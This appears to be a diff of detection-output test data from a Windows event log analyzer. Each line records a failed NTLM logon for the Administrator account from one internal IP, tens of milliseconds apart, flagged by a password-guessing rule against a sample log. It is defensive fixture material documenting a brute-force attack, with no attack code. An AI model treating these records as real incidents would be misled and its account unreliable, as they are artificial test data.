+2016-09-20 01:51:08.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: m8m9SJ1aFpvFqClU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dM84lQYVfHhZmgpK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: O5FrdBbYXWaqFkeb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZxiNMjsd3YfoCNa2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: v1u5uD9SiDFq9VOD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.675 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pZv9l3b7U8tIVmw8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.716 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7EfPqiBhm6hRX700  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.763 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3uvqgri2KGIDAlg1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oLXZMXKsjOaurgZV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nXtiRWHDJqpq69Ej  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.915 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OeC1T9YkT1hXMcGG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YPf6nlwAeuu7cf00  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4fvVUozD2RuIchN4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KP3rghcrgas3l3q1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MMtcQYoVoM57gTcj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.137 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IFjTWECEep09Abjt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.177 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jUlguy8tKBo4DSUR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GETwMERLpiVtMRkw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Bhas9Vjc193EVcOg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OmVAnxq39t7qbcEs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 13y2nnltjipwZqth  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wDQrPBL1VodIcQLR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: K0Mp4jXeHd3b0CLw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.472 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3j89GmIDnG4v7JJC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.512 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xyRLZMoaXJUrPPfn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.607 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZcoyOKUjEi1uCSpD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jWQGVJLcVwgf4YJ8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mrFqG85mmjTYJ4A9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6DqIh1QHTk470nrU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: feVbA94p6iT2pBeC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: T30YHcE8ZG7FaxW7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.847 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RaKHRwYtx2lGtOCG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zDEDuMmlDZZfdkFD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CObqGJQi1hOOI83J  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.002 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EhsE9bQeEwW21bAj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.050 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: El1qxgjvGS0QSS4Y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.097 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vtlr3HwzJcAfSxuO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.141 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KDayr44iXmE63vqd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FkNoLVOhnS8ayujK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3ggg78jjziKqijrT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BodeSVqeqa5qBQDL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.362 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yY7yxEcuGwWSJZV2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.406 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oTlg6cvsz6Z6QpCp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: V3pTALzqu4Ok6CUR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.509 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kdGagQIEcvQQMp4n  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fVu4reOyQEIkChHO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.609 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EJWNS69MmMGLSnHc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nPaR2sBxPPCjxpL0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kJJ9A1EfqM4V2TRv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4dxf59xjpxO3oG17  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: o6dMI12g4tjSF8PX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZAqN0xPaW4jg2Kjc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mcnReyIEaqsQfowV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: akOH8Y7XdjOpqTez  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.967 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: b0HOK1TIqloud7gh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: n6uIAK55BmTnA6Bf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.042 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZDnn6QmLOJ6KwzKt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: np8KaRJvRqBrGyFL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dxbu69Amr6gWN5Hw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LoZdaFJWNON8Ujnc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: q4RSlXgOS7sssCqU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: j2PJprE7olK4pjrx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jQOAUcWQL32y2gGe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nXI0wWwzhHN0uvOP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.414 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ujGqTzfOhmKgoAjt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cFoPtWZ03O3ZZgOC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EyO2VTnpGZLeSIvr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ua69MEWABQ9hsooT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ubPQWn4nQYr3rXr8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xrgATdNqkA44nKqf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qKwktiUfTWakNx3I  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xVebPFnWhbZKIANs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
